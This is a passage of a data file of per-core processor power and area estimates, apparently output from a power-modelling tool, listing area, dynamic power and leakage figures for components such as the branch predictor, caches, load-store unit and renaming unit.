'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00079136,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00079136,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000687776,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000265431,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00148131,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00375181,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00764096,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.099131,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.30558,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.246846,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.336694,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.83012,
'Instruction Fetch Unit/Runtime Dynamic': 0.694063,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0654942,
'L2/Runtime Dynamic': 0.00346993,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.98254,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.840294,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0564683,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0564683,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.24919,
'Load Store Unit/Runtime Dynamic': 1.17524,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.139241,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.278482,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0494172,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.050393,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.392058,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0404897,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.633057,
'Memory Management Unit/Runtime Dynamic': 0.0908827,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.7965,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.632894,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0227002,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.15395,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.809544,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.72128,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.241651,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.392492,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.30419,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.339632,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.547813,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.276518,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.16396,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.18849,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.49025,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.246389,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0142457,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.193517,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.105356,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.439906,
'Execution Unit/Register Files/Runtime Dynamic': 0.119601,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.468112,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.916376,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.99781,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00082015,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00082015,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000712972,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000275249,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00151344,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00386671,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00791277,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.101281,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.252422,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.343996,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96396,
'Instruction Fetch Unit/Runtime Dynamic': 0.709478,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.066792,
'L2/Runtime Dynamic': 0.00485081,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.9995,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.849647,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.057017,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.057017,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.26874,
'Load Store Unit/Runtime Dynamic': 1.18785,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.140594,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.281188,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0498974,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0508929,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0414031,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.641818,
'Memory Management Unit/Runtime Dynamic': 0.092296,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 23.021,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.648137,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0232109,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.157205,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.828553,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.82084,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.242713,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.393326,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.31004,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.339927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.54829,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.276759,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.16498,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.187931,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.4994,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.247494,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0142581,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.194,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.105447,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.441494,
'Execution Unit/Register Files/Runtime Dynamic': 0.119705,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.469395,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.917169,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 3.00055,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
